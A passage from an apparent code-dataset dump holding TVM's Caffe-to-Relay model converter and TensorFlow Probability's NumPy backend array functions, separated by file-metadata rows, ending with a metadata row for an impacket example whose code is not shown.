var_expr = self.exp_tab.new_const(var, dtype="float32")
tmp_out = _op.multiply(in_expr, mean_expr)
out = _op.add(tmp_out, var_expr)
return out
else:
scale = np.asarray(weight_bias_blobs[2].data, np.float32)
if scale:
scale = 1 / scale
mean_expr = self.exp_tab.new_const(mean * scale, dtype="float32")
var_expr = self.exp_tab.new_const(var * scale, dtype="float32")
# caffe bn layer not support scale
gamma_expr = self.exp_tab.new_const(
np.ones(mean.shape, dtype=np.float32), dtype="float32"
)
beta_expr = self.exp_tab.new_const(
np.zeros(mean.shape, dtype=np.float32), dtype="float32"
)
bn_params = op.batch_norm_param.eps
out = _op.nn.batch_norm(
in_expr, gamma_expr, beta_expr, mean_expr, var_expr, epsilon=bn_params, scale=False
)
return out[0]
def convert_scale(self, op):
"""Convert Scale layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
weight_bias_blobs = self.init_layer_dict[op.name].blobs
params = dict()
params["bias"] = op.scale_param.bias_term
params["axis"] = op.scale_param.axis
gamma = np.asarray(weight_bias_blobs[0].data, np.float32)
gamma_expr = self.exp_tab.new_const(gamma, dtype="float32")
if params["bias"]:
beta = np.asarray(weight_bias_blobs[1].data, np.float32)
beta_expr = self.exp_tab.new_const(beta, dtype="float32")
else:
beta_expr = self.exp_tab.new_const(
np.zeros(gamma.shape, dtype=np.float32), dtype="float32"
)
_, c, _, _ = _infer_shape(in_expr)
gamma_expr = _op.reshape(gamma_expr, newshape=(1, c, 1, 1))
beta_expr = _op.reshape(beta_expr, newshape=(1, c, 1, 1))
out = _op.multiply(in_expr, gamma_expr)
out = _op.add(out, beta_expr)
return out
def convert_concat(self, op):
"""Convert Concat layer"""
inputs = op.bottom
in_expr = (self.exp_tab.get_expr(inputs[i]) for i in range(len(inputs)))
c_params = dict()
c_params["axis"] = op.concat_param.axis
out = _op.concatenate(in_expr, axis=c_params["axis"])
return out
def convert_reshape(self, op):
"""Convert Reshape layer"""
inputs = op.bottom
input_name = inputs[0]
reshape_param = op.reshape_param
dims = list(reshape_param.shape.dim)
in_expr = self.exp_tab.get_expr(input_name)
input_shape = list(_infer_shape(in_expr))
start_axis = int(reshape_param.axis)
if start_axis < 0:
start_axis = len(input_shape) + start_axis + 1
num_axes = int(reshape_param.num_axes)
end_axis = len(input_shape)
if num_axes != -1:
end_axis = start_axis + num_axes
left_shape = input_shape[:start_axis]
if end_axis == len(input_shape):
center_shape = input_shape[start_axis:]
right_shape = []
else:
center_shape = input_shape[start_axis:end_axis]
right_shape = input_shape[end_axis:]
for idx, dim in enumerate(dims):
if dim == 0:
dims[idx] = center_shape[idx]
tmp = np.random.rand(*center_shape)
tmp = np.reshape(tmp, dims)
center_shape = list(tmp.shape)
newshape = left_shape + center_shape + right_shape
out = _op.reshape(in_expr, newshape=newshape)
return out
def convert_softmax(self, op):
"""Convert Softmax layer"""
inputs = op.bottom
assert len(inputs) == 1, "input tensors length should be 1"
input_name = inputs[0]
in_expr = self.exp_tab.get_expr(input_name)
softmax_param = op.softmax_param
parmas = {"axis": softmax_param.axis}
out = _op.nn.softmax(in_expr, **parmas)
return out
def convert_conv(self, op):
"""Convert Convolution layer"""
params = self._parse_conv_params(op)
weight_bias_blobs = self.init_layer_dict[op.name].blobs
conv_params = op.convolution_param
inputs = op.bottom
# process weight and bias blobs
weight, bias = None, None
if len(weight_bias_blobs) > 1:
weight = weight_bias_blobs[0]
bias = weight_bias_blobs[1]
else:
weight = weight_bias_blobs[0]
if weight:
kh, kw = params["kernel_size"]
weight_shape = [conv_params.num_output, -1, kh, kw]
weight_value = np.asarray(weight.data, np.float32)
weight_value = np.reshape(weight_value, weight_shape)
else:
raise Exception("No weight value of layer {} in caffemodel".format(op.name))
weight_expr = self.exp_tab.new_const(weight_value, dtype="float32")
in_expr = self.exp_tab.get_expr(inputs[0])
out = _op.nn.conv2d(data=in_expr, weight=weight_expr, **params)
if bias:
bias_value = np.asarray(bias.data, np.float32)
bias_expr = self.exp_tab.new_const(bias_value, dtype="float32")
out = _op.nn.bias_add(out, bias_expr)
return out
def convert_pooling(self, op):
"""Convert Pooling layer"""
inputs = op.bottom
input_name = inputs[0]
pool_params = op.pooling_param
pool_type_dict = ["MAX", "AVE", "STOCHASTIC"]
params = dict()
# parse pool type: 0: MAX, 1: AVE, 2: STOCHASTIC
pool_type = pool_params.pool
# parse kernel size
if pool_params.kernel_h > 0 or pool_params.kernel_w > 0:
params["pool_size"] = (pool_params.kernel_h, pool_params.kernel_w)
else:
params["pool_size"] = (pool_params.kernel_size, pool_params.kernel_size)
# parse padding size
if pool_params.pad_h > 0 or pool_params.pad_w > 0:
params["padding"] = (pool_params.pad_h, pool_params.pad_w)
else:
params["padding"] = (pool_params.pad, pool_params.pad)
# parse stride size
if pool_params.stride_h > 0 or pool_params.stride_w > 0:
params["strides"] = (pool_params.stride_h, pool_params.stride_w)
else:
params["strides"] = (pool_params.stride, pool_params.stride)
params["ceil_mode"] = True
if hasattr(pool_params, "round_mode"):
params["ceil_mode"] = pool_params.round_mode == "CEIL"
in_expr = self.exp_tab.get_expr(input_name)
if pool_type_dict[pool_type] == "MAX":
if pool_params.global_pooling:
out = _op.nn.global_max_pool2d(in_expr)
else:
if len(op.top) == 1:
out = _op.nn.max_pool2d(in_expr, **params)
elif len(op.top) == 2:
out1 = _op.nn.max_pool2d_with_argmax(in_expr, **params)
out2 = _op.vision.max_pool2d_location(in_expr, **params)
return _expr.Tuple((out1, out2))
elif pool_type_dict[pool_type] == "AVE": # AVE
if pool_params.global_pooling:
out = _op.nn.global_avg_pool2d(in_expr)
else:
params["count_include_pad"] = True
out = _op.nn.avg_pool2d(in_expr, **params)
else:
raise tvm.error.OpNotImplemented(
"Operator {} is not supported for frontend Caffe.".format(
pool_type_dict[pool_type] + " pool"
)
)
return out
def convert_lrn(self, op):
"""Convert LRN layer"""
inputs = op.bottom
input_name = inputs[0]
params = dict()
lrn_params = op.lrn_param
params["size"] = lrn_params.local_size
params["bias"] = lrn_params.k
params["alpha"] = lrn_params.alpha
params["beta"] = lrn_params.beta
in_expr = self.exp_tab.get_expr(input_name)
out = _op.nn.lrn(in_expr, **params)
return out
def convert_innerproduct(self, op):
"""Convert InnerProduct layer"""
inputs = op.bottom
weight_bias_blobs = self.init_layer_dict[op.name].blobs
dense_params = op.inner_product_param
params = dict()
params["num_output"] = dense_params.num_output
params["bias"] = dense_params.bias_term
params["axis"] = dense_params.axis
if params["axis"] != 1:
raise Exception("Only support 2D InnerProduct")
# process weight and bias blobs
weight, bias = None, None
if params["bias"]:
weight = weight_bias_blobs[0]
bias = weight_bias_blobs[1]
else:
weight = weight_bias_blobs[0]
if weight:
weight_value = np.asarray(weight.data, np.float32)
weight_value = np.reshape(weight_value, (params["num_output"], -1))
weight_shape = weight_value.shape
else:
raise Exception("No weight value of layer {} in caffemodel".format(op.name))
weight_expr = self.exp_tab.new_const(weight_value, dtype="float32")
in_expr = self.exp_tab.get_expr(inputs[0])
in_reshape = _op.reshape(data=in_expr, newshape=(-1, weight_shape[-1]))
out = _op.nn.dense(data=in_reshape, weight=weight_expr)
if bias:
bias_value = np.asarray(bias.data, np.float32)
bias_expr = self.exp_tab.new_const(bias_value, dtype="float32")
out = _op.nn.bias_add(out, bias_expr, axis=params["axis"])
return out
def convert_dropout(self, op):
"""Convert Dropout layer"""
inputs = op.bottom
input_name = inputs[0]
params = dict()
dropout_params = op.dropout_param
params["rate"] = dropout_params.dropout_ratio
in_expr = self.exp_tab.get_expr(input_name)
out = _op.nn.dropout(in_expr, **params)
return out
def convert_relu(self, op):
"""Convert ReLU layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
negative_slope = op.relu_param.negative_slope
if negative_slope:
out = _op.nn.leaky_relu(in_expr, negative_slope)
return out
out = _op.nn.relu(in_expr)
return out
def convert_prelu(self, op):
"""Convert PReLU layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
alpha = self.init_layer_dict[op.name].blobs[0].data
alpha = np.asarray(alpha, np.float32)
alpha = self.exp_tab.new_const(alpha, dtype="float32")
axis = 1
out = _op.nn.prelu(in_expr, alpha, axis=axis)
return out
def convert_deconv(self, op):
"""Convert Deconvolution layer"""
params = self._parse_conv_params(op)
weight_bias_blobs = self.init_layer_dict[op.name].blobs
conv_params = op.convolution_param
inputs = op.bottom
# process weight and bias blobs
weight, bias = None, None
if len(weight_bias_blobs) > 1:
weight = weight_bias_blobs[0]
bias = weight_bias_blobs[1]
else:
weight = weight_bias_blobs[0]
if weight:
kh, kw = params["kernel_size"]
weight_shape = [-1, conv_params.num_output, kh, kw]
if not weight.data:
if conv_params.weight_filler:
_filler = conv_params.weight_filler.value
weight_value = np.full(weight.shape.dim, _filler, np.float32)
else:
raise tvm.error.OpAttributeInvalid("At least weight_filler must be given")
else:
weight_value = np.asarray(weight.data, np.float32)
weight_value = np.reshape(weight_value, weight_shape)
# weight shape is in relay's IOHW format rn, we need it to be OIHW
weight_value = np.transpose(weight_value, [1, 0, 2, 3])
else:
raise tvm.error.OpAttributeRequired(
"No weight value of layer {} in caffemodel".format(op.name)
)
weight_expr = self.exp_tab.new_const(weight_value, dtype="float32")
in_expr = self.exp_tab.get_expr(inputs[0])
groups = params["groups"]
channels = params["channels"]
if bias:
bias_value = np.asarray(bias.data, np.float32)
bias_expr = self.exp_tab.new_const(bias_value, dtype="float32")
if groups > channels:
raise tvm.error.OpAttributeInvalid(
"Groups cannot be larger than the number of input channels"
)
if groups == channels:
inputs_expr = _op.split(in_expr, groups, axis=1)
# changing split axis to 0, according to PR #9336
weights_expr = _op.split(weight_expr, groups, axis=0)
# Preventing to create Concat layer with too many tensors(> 16)
q = groups >> 4
r = groups % 16
params["groups"] = 1
params["channels"] = 1
out = []
for lc in range(q):
_outputs = []
_inputs = [inputs_expr[i] for i in range(lc << 4, (lc << 4) + 16)]
_weights = [weights_expr[i] for i in range(lc << 4, (lc << 4) + 16)]
for (i, w) in zip(_inputs, _weights):
_out = _op.nn.conv2d_transpose(data=i, weight=w, **params)
if bias:
_out = _op.nn.bias_add(_out, bias_expr)
_outputs.append(_out)
out.append(_op.concatenate(_outputs, axis=1))
if r != 0:
_outputs = []
_inputs = [inputs_expr[i] for i in range(groups - r, groups)]
_weights = [weights_expr[i] for i in range(groups - r, groups)]
for (i, w) in zip(_inputs, _weights):
_out = _op.nn.conv2d_transpose(data=i, weight=w, **params)
if bias:
_out = _op.nn.bias_add(_out, bias_expr)
_outputs.append(_out)
out.append(_op.concatenate(_outputs, axis=1))
out = _op.concatenate(out, axis=1)
elif groups == 1:
out = _op.nn.conv2d_transpose(data=in_expr, weight=weight_expr, **params)
if bias:
out = _op.nn.bias_add(out, bias_expr)
else:
raise tvm.error.OpAttributeInvalid("Unable to handle.")
return out
def convert_slice(self, op):
"""Convert Slice layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
output_num = len(op.top)
slice_params = op.slice_param
axis = int(slice_params.axis)
indices_or_sections = list([int(s) for s in slice_params.slice_point])
if len(indices_or_sections) == 0:
indices_or_sections = output_num
else:
indices_or_sections = sorted(indices_or_sections)
out = _op.split(in_expr, indices_or_sections=indices_or_sections, axis=axis)
return out
def convert_sigmoid(self, op):
"""Convert Sigmoid layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
out = _op.sigmoid(in_expr)
return out
def convert_tanh(self, op):
"""Convert TanH layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
out = _op.tanh(in_expr)
return out
def convert_reduction(self, op):
"""Convert Reduction layer"""
reduction_dic = ["NOP", "SUM", "ASUM", "SUMSQ", "MEAN"]
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
method = op.reduction_param.operation
axis = op.reduction_param.axis
coeff = op.reduction_param.coeff
coeff_expr = self.exp_tab.new_const(np.asarray(coeff, np.float32))
num_axes = len(_infer_shape(in_expr))
# Currently, only reduction along ALL "tail" axes is supported in Caffe;
# reduction of axis M through N, where N < num_axes - 1, is unsupported.
if 0 < axis < (num_axes - 1):
for _axis in reversed(range(axis + 1, num_axes)):
in_expr = _op.sum(in_expr, axis=_axis)
in_expr = _op.squeeze(in_expr)
if reduction_dic[method] == "SUM":
out = _op.sum(in_expr, axis=axis)
elif reduction_dic[method] == "MEAN":
out = _op.mean(in_expr, axis=axis)
elif reduction_dic[method] == "ASUM":
in_expr = _op.abs(in_expr)
out = _op.sum(in_expr, axis=axis)
elif reduction_dic[method] == "SUMSQ":
in_expr = _op.multiply(in_expr, in_expr)
out = _op.sum(in_expr, axis=axis)
else:
raise tvm.error.OpAttributeInvalid(
"reduction method:{} is invalid in Caffe frontend.".format(method)
)
if float(coeff) != 1.0:
out = _op.multiply(out, coeff_expr)
return out
def convert_crop(self, op):
"""Convert Crop layer"""
inputs = op.bottom
assert len(inputs) == 2, "Need two inputs of Crop layer"
in_expr_a = self.exp_tab.get_expr(inputs[0])
in_expr_b = self.exp_tab.get_expr(inputs[1])
# parse crop params
crop_params = op.crop_param
axis = int(getattr(crop_params, "axis", 2))
offset = list(getattr(crop_params, "offset", 0))
# expand offset to (offset1, offset2, ...)
in_a_shape = _infer_shape(in_expr_a)
num_to_crop = len(in_a_shape) - axis
if not offset:
offset = [0] * num_to_crop
if len(offset) == 1:
offset = offset * num_to_crop
elif len(offset) != num_to_crop:
raise Exception("No matching the number between axis and offset!")
slice_end = in_a_shape
slice_start = [0] * len(in_a_shape)
for i in range(num_to_crop):
slice_start[i + axis] = offset[i]
to_crop_axis = list(range(len(in_a_shape)))
to_crop_axis = to_crop_axis[axis:]
# secondly, crop in_expr_a by in_expr_b
in_expr_a_stride = _op.strided_slice(in_expr_a, slice_start, slice_end)
out = _op.slice_like(in_expr_a_stride, in_expr_b, axes=to_crop_axis)
return out
def convert_permute(self, op):
"""Convert Permute layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
# parse permute params
permute_param = op.permute_param
axes = list(getattr(permute_param, "order", 0))
out = _op.transpose(in_expr, axes)
return out
def convert_embed(self, op):
"""Convert Embed layer"""
inputs = op.bottom
embed_param = op.embed_param
num_output = embed_param.num_output
input_dim = embed_param.input_dim
bias_term = embed_param.bias_term
weight_bias_blobs = self.init_layer_dict[op.name].blobs
weight, bias = None, None
if bias_term:
weight = weight_bias_blobs[0]
bias = weight_bias_blobs[1]
assert weight and bias
else:
weight = weight_bias_blobs[0]
assert weight
weight_value = np.asarray(weight.data, np.float32)
weight_value = np.reshape(weight_value, [input_dim, num_output])
weight_expr = self.exp_tab.new_const(weight_value, dtype="float32")
in_expr = self.exp_tab.get_expr(inputs[0])
input_shape = _infer_shape(in_expr)
input_count = 1
for dim in input_shape:
input_count *= dim
index = _op.cast(in_expr, "int32")
out = _op.take(weight_expr, index, axis=0)
if bias_term:
bias_value = np.asarray(bias.data, np.float32)
bias_expr = self.exp_tab.new_const(bias_value, dtype="float32")
out = _op.reshape(out, [input_count, num_output])
out = _op.add(out, bias_expr)
out_shape = list(input_shape)
out_shape.append(num_output)
out = _op.reshape(out, out_shape)
return out
def convert_power(self, op):
"""Convert Power layer"""
inputs = op.bottom
in_expr = self.exp_tab.get_expr(inputs[0])
power = _expr.const(op.power_param.power)
scale = _expr.const(op.power_param.scale)
shift = _expr.const(op.power_param.shift)
out = _op.multiply(in_expr, scale)
out = _op.add(out, shift)
out = _op.power(out, power)
return out
def check_unsupported_ops(self):
"""Check unsupported Caffe ops in our converter."""
unsupported_ops_set = set()
include_layer = dict()
for pl in self.predict_layer:
if pl.type not in include_layer:
include_layer[pl.type] = 1
else:
include_layer[pl.type] = include_layer[pl.type] + 1
for pl in self.predict_layer:
op_name = pl.type
if op_name not in self.convert_map:
unsupported_ops_set.add(op_name)
if unsupported_ops_set:
msg = "The following operators are not supported in frontend " "Caffe: {}"
ops = str(list(unsupported_ops_set)).strip("[,]")
raise tvm.error.OpNotImplemented(msg.format(ops))
def fuse_op(self, layers):
"""Fusing the BatchNorm and Scale layer"""
bn, scale = layers["bn"], layers["scale"]
# bn params
bn_weight_bias_blobs = self.init_layer_dict[bn.name].blobs
bn_scale = np.asarray(bn_weight_bias_blobs[2].data, np.float32)
if bn_scale:
bn_scale = 1 / bn_scale
bn_mean = np.asarray(bn_weight_bias_blobs[0].data, np.float32) * bn_scale
bn_var = np.asarray(bn_weight_bias_blobs[1].data, np.float32) * bn_scale
bn_eps = bn.batch_norm_param.eps
# scale params
scale_weight_bias_blobs = self.init_layer_dict[scale.name].blobs
scale_gamma = np.asarray(scale_weight_bias_blobs[0].data, np.float32)
scale_bias = scale.scale_param.bias_term
if scale_bias:
scale_beta = np.asarray(scale_weight_bias_blobs[1].data, np.float32)
else:
scale_beta = np.zeros(scale_gamma.shape, dtype=np.float32)
# new params
self.new_bn[bn.name] = [bn_mean, bn_var, bn_eps, scale_gamma, scale_beta]
return bn
def op_fuse(self):
"""fuse bn and scale"""
new_layers = []
temp_layers = {}
changed_layers = {}
for index, pl in enumerate(self.predict_layer):
op_type = pl.type
if op_type == "Input":
new_layers.append(pl)
continue
elif op_type == "BatchNorm":
if (index != len(self.predict_layer) - 1) and (
self.predict_layer[index + 1].type == "Scale"
):
temp_layers["bn"] = pl
continue
else:
new_layers.append(pl)
temp_layers.clear()
elif op_type == "Scale":
if self.predict_layer[index - 1].type == "BatchNorm":
temp_layers["scale"] = pl
else:
new_layers.append(pl)
temp_layers.clear()
else:
temp_layers.clear()
if len(temp_layers) == 2:
layer = self.fuse_op(temp_layers)
new_layers.append(layer)
changed_layers[temp_layers["scale"].name] = temp_layers["bn"].name
for idx, plt in enumerate(pl.bottom):
if plt in changed_layers:
pl.bottom[idx] = changed_layers[plt]
if op_type not in ["BatchNorm", "Scale"]:
new_layers.append(pl)
self.predict_layer = new_layers
self.changed_layers = changed_layers
def convert_op_to_relay(self):
"""Convert Caffe ops to relay ops"""
for pl in self.predict_layer:
op_type = pl.type
if op_type == "Input":
continue
output_tensors = pl.top
ret = self.convert_map[op_type](pl)
if len(output_tensors) == 1:
self.exp_tab.set_expr(output_tensors[0], ret)
else:
for idx, output_tensor in enumerate(output_tensors):
self.exp_tab.set_expr(output_tensor, ret[idx])
def _rebuild_layers(predict_layer):
"""Rebuild caffe layer. If the the caffe net include in-place layers, repalce its top
with its name and update the bottom of other layer that is related to it.
"""
# dict of input name that will be changed to new name
changed_top_dict = dict()
for pl in predict_layer:
if pl.type == "Input":
continue
# if current layer has single input and output and input equals to output
# it means that the layer does "in-place"
if len(pl.top) == 1 and len(pl.bottom) == 1:
if pl.top[0] == pl.bottom[0]:
# change current layer's input firstly
if pl.bottom[0] in changed_top_dict:
pl.bottom[0] = changed_top_dict[pl.bottom[0]]
# update "change" dict
changed_top_dict[pl.top[0]] = pl.name
# change current layer's output to its name
pl.top[0] = pl.name
else:
if pl.bottom[0] in changed_top_dict:
pl.bottom[0] = changed_top_dict[pl.bottom[0]]
# if the layer does not
else:
for index, plt in enumerate(pl.bottom):
if plt in changed_top_dict:
pl.bottom[index] = changed_top_dict[plt]
def _get_inputs_outputs(predict_layer):
"""Obtain Caffe model's inputs and outpus"""
# model inputs / outputs
model_inputs = list()
model_outputs = list()
# The bottoms of every layer can not be as outputs
not_outputs = set()
for pl in predict_layer:
if pl.type == "Input":
assert len(pl.top) == 1, "The number of Input layer's output is more than 1."
model_inputs.append(pl.top[0])
for i in pl.bottom:
not_outputs.add(i)
for pl in predict_layer:
if len(pl.bottom) > 0:
for t in pl.top:
if t not in not_outputs:
model_outputs.append(t)
return model_inputs, model_outputs
def from_caffe(init_net, predict_net, shape_dict, dtype_dict):
"""Convert from caffe model into compatible relay Function.
Parameters
----------
init_net : caffe_pb2.NetParameter
caffemodel
predict_net : caffe_pb2.NetParameter
caffe prototxt
shape_dict : dict of str to int list/tuple
Input shapes of the model.
dtype_dict : dict of str to str
Input types of the model.
Returns
-------
mod : tvm.IRModule
The relay module for compilation.
params : dict of str to tvm.NDArray
The parameter dict to be used by relay
"""
old_caffe = False
if len(predict_net.input) != 0: # old caffe version
old_caffe = True
model_inputs = list(predict_net.input)
predict_layer = predict_net.layer
# replace layer's top with its name and update other layers'bottoms
_rebuild_layers(predict_layer)
# obtain inputs and outputs of Net
if old_caffe:
_, model_outputs = _get_inputs_outputs(predict_layer)
else:
model_inputs, model_outputs = _get_inputs_outputs(predict_layer)
exp_tab = ExprTable()
for in_name in model_inputs:
shape = shape_dict[in_name] if in_name in shape_dict else None
dtype = dtype_dict[in_name] if in_name in dtype_dict else "float32"
exp_tab.set_expr(in_name, _expr.var(in_name, shape=shape, dtype=dtype))
if list(init_net.layer):
init_layer = init_net.layer
else:
init_layer = init_net.layers
init_layer_dict = {il.name: il for il in init_layer}
# op code in model
op_converter = OperatorConverter(init_layer_dict, predict_layer, exp_tab)
op_converter.check_unsupported_ops()
op_converter.op_fuse()
op_converter.convert_op_to_relay()
# params and outputs
params = {k: _nd.array(np.array(v)) for k, v in exp_tab.params.items()}
outputs = list()
for n in model_outputs:
if n in op_converter.changed_layers:
n = op_converter.changed_layers[n]
outputs.append(exp_tab.get_expr(n))
outputs = outputs[0] if len(outputs) == 1 else _expr.Tuple(outputs)
func = _function.Function(analysis.free_vars(outputs), outputs)
mod = IRModule.from_expr(func)
return mod, params
| 37.781312
| 99
| 0.592402
|
0bdf063df4e23fe48a69f49208f757dbb8660194
| 9,021
|
py
|
Python
|
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Numpy implementations of TensorFlow general top-level functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow as tf
from tensorflow_probability.python.internal.backend.numpy.internal import utils
from tensorflow_probability.python.internal.backend.numpy.linalg import norm
__all__ = [
'concat',
'expand_dims',
'fill',
'gather',
'gather_nd',
'linspace',
'meshgrid',
'norm',
'one_hot',
'ones',
'ones_like',
'pad',
'range',
'rank',
'reshape',
'reverse',
'roll',
'searchsorted',
'shape',
'size',
'slice',
'split',
'squeeze',
'stack',
'tile',
'transpose',
'unstack',
'where',
'zeros',
'zeros_like',
# 'boolean_mask',
# 'einsum',
# 'foldl',
# 'foldr',
# 'tensordot',
]
# TODO(b/256095991): Add unit test.
def _gather( # pylint: disable=unused-argument
params,
indices,
validate_indices=None,
axis=None,
batch_dims=0,
name=None):
"""gather."""
if validate_indices is not None:
raise NotImplementedError(
'Argument `validate_indices != None` is currently unimplemented.')
if batch_dims != 0:
raise NotImplementedError(
'Argument `batch_dims != 0` is currently unimplemented.')
return np.take(params, indices, axis=axis)
def _gather_nd( # pylint: disable=unused-argument
params,
indices,
batch_dims=0,
name=None):
"""gather_nd."""
raise NotImplementedError
def _one_hot( # pylint: disable=unused-argument
indices,
depth,
on_value=None,
off_value=None,
axis=None,
dtype=None,
name=None):
"""One hot."""
if on_value is None:
on_value = 1
if off_value is None:
off_value = 0
if axis is None:
axis = -1
zeros = np.zeros_like(indices) # pylint: disable=redefined-outer-name
zeros = np.tile(zeros[..., None], [1] * len(indices.shape) + [depth])
ones = np.ones_like(zeros) # pylint: disable=redefined-outer-name
cond = np.abs(np.arange(depth, dtype=np.float32)[None] + zeros
- indices[..., None] + zeros) < 0.1
y_out = np.where(cond, ones * on_value, zeros + off_value)
if axis is not None:
y_out = np.swapaxes(y_out, axis, -1)
return y_out
def _ones_like(input, dtype=None, name=None): # pylint: disable=redefined-builtin
s = _shape(input)
if isinstance(s, (np.ndarray, np.generic)):
return np.ones(s, utils.numpy_dtype(dtype or input.dtype))
return tf.ones(s, dtype or s.dtype, name)
# TODO(b/136555907): Add unit-test.
def _pad( # pylint: disable=unused-argument
tensor,
paddings,
mode='CONSTANT',
name=None,
constant_values=0):
return np.pad(
tensor, paddings,
mode=mode.lower(),
constant_values=constant_values)
def _reverse(tensor, axis, name=None): # pylint: disable=unused-argument
if np.array(axis).ndim == 0:
return np.flip(tensor, axis)
for ax in axis:
tensor = np.flip(tensor, ax)
return tensor
def _searchsorted( # pylint: disable=unused-argument
sorted_sequence,
values,
side='left',
out_type=tf.int32,
name=None):
return np.searchsorted(
sorted_sequence, values, side=side, sorter=None).astype(out_type)
def _shape(input, out_type=tf.int32, name=None): # pylint: disable=redefined-builtin,unused-argument
return np.array(np.array(input).shape).astype(utils.numpy_dtype(out_type))
def _size(input, out_type=tf.int32, name=None): # pylint: disable=redefined-builtin, unused-argument
return np.prod(np.array(input).shape).astype(utils.numpy_dtype(out_type))
builtin_slice = slice # pylint: disable=invalid-name
def _slice(input_, begin, size, name=None): # pylint: disable=unused-argument,redefined-outer-name
slices = tuple(
builtin_slice(b, b + s if s != -1 else -1) for b, s in zip(begin, size))
return input_[slices]
def _split(value, num_or_size_splits, axis=0, num=None, name='split'): # pylint: disable=unused-argument
"""Map tf.split -> np.split."""
indices_or_sections = num_or_size_splits
if np.array(indices_or_sections).ndim == 1:
if any(idx == -1 for idx in indices_or_sections):
# Numpy parameterizes by split indices and returns nsplits+1 arrays.
total_splits = sum(idx for idx in indices_or_sections if idx != -1)
remainder = max(0, np.array(value).shape[axis] - total_splits)
indices_or_sections = [
idx if idx != -1 else remainder for idx in indices_or_sections
]
indices_or_sections = np.cumsum(indices_or_sections)[:-1]
return np.split(value, indices_or_sections, axis)
def _transpose(a, perm=None, conjugate=False, name='transpose'): # pylint: disable=unused-argument
x = np.transpose(a, perm)
return np.conjugate(x) if conjugate else x
def _zeros_like(input, dtype=None, name=None): # pylint: disable=redefined-builtin
s = _shape(input)
if isinstance(s, (np.ndarray, np.generic)):
return np.zeros(s, utils.numpy_dtype(dtype or input.dtype))
return tf.zeros(s, dtype or s.dtype, name)
# --- Begin Public Functions --------------------------------------------------
concat = utils.copy_docstring(
tf.concat,
lambda values, axis, name='concat': np.concatenate(values, axis))
expand_dims = utils.copy_docstring(
tf.expand_dims,
lambda input, axis, name=None: np.expand_dims(input, axis))
fill = utils.copy_docstring(
tf.fill,
lambda dims, value, name=None: value * np.ones(dims, np.array(value).dtype))
gather = utils.copy_docstring(
tf.gather,
_gather)
gather_nd = utils.copy_docstring(
tf.gather_nd,
_gather_nd)
reverse = utils.copy_docstring(tf.reverse, _reverse)
linspace = utils.copy_docstring(
tf.linspace,
lambda start, stop, num, name=None: ( # pylint: disable=g-long-lambda
np.linspace(start, stop, num).astype(np.array(start).dtype)))
meshgrid = utils.copy_docstring(
tf.meshgrid,
np.meshgrid)
norm = utils.copy_docstring(
tf.norm,
norm)
one_hot = utils.copy_docstring(
tf.one_hot,
_one_hot)
ones = utils.copy_docstring(
tf.ones,
lambda shape, dtype=tf.float32, name=None: np.ones( # pylint: disable=g-long-lambda
shape, utils.numpy_dtype(dtype)))
ones_like = utils.copy_docstring(
tf.ones_like,
_ones_like)
pad = utils.copy_docstring(
tf.pad,
_pad)
range = utils.copy_docstring( # pylint: disable=redefined-builtin
tf.range,
lambda start, limit=None, delta=1, dtype=None, name='range': ( # pylint: disable=g-long-lambda
np.arange(start, limit, delta, utils.numpy_dtype(dtype))))
rank = utils.copy_docstring(
tf.rank,
lambda input, name=None: len(np.array(input).shape)) # pylint: disable=redefined-builtin,g-long-lambda
reshape = utils.copy_docstring(
tf.reshape,
lambda tensor, shape, name=None: np.reshape(tensor, shape))
roll = utils.copy_docstring(
tf.roll,
lambda input, shift, axis: np.roll(input, shift, axis)) # pylint: disable=unnecessary-lambda
searchsorted = utils.copy_docstring(
tf.searchsorted,
_searchsorted)
shape = utils.copy_docstring(
tf.shape,
_shape)
size = utils.copy_docstring(
tf.size,
_size)
slice = utils.copy_docstring( # pylint: disable=redefined-builtin
tf.slice, _slice)
split = utils.copy_docstring(tf.split, _split)
squeeze = utils.copy_docstring(
tf.squeeze,
lambda input, axis=None, name=None: np.squeeze(input, axis))
stack = utils.copy_docstring(
tf.stack, lambda values, axis=0, name=None: np.stack(values, axis))
tile = utils.copy_docstring(
tf.tile,
lambda input, multiples, name=None: np.tile(input, multiples))
transpose = utils.copy_docstring(
tf.transpose,
_transpose)
unstack = utils.copy_docstring(
tf.unstack,
lambda value, num=None, axis=0, name=None: np.split(value, num, axis))
where = utils.copy_docstring(
tf.compat.v1.where,
lambda condition, x=None, y=None, name=None: np.where(condition, x, y))
zeros = utils.copy_docstring(
tf.zeros,
lambda shape, dtype=tf.float32, name=None: np.zeros( # pylint: disable=g-long-lambda
shape, utils.numpy_dtype(dtype)))
zeros_like = utils.copy_docstring(
tf.zeros_like,
_zeros_like)
| 27.336364
| 107
| 0.676533
|
adb3bc21dd6f84871a2daba6754f08f0f7f73fcf
| 21,876
|
py
|
Python
|
examples/netview.py
|
grkoll/impacket
|
90a91045139659d83409af1771dcaf697c00de99
|
[
"Apache-1.1"
] | null | null | null |
examples/netview.py
|
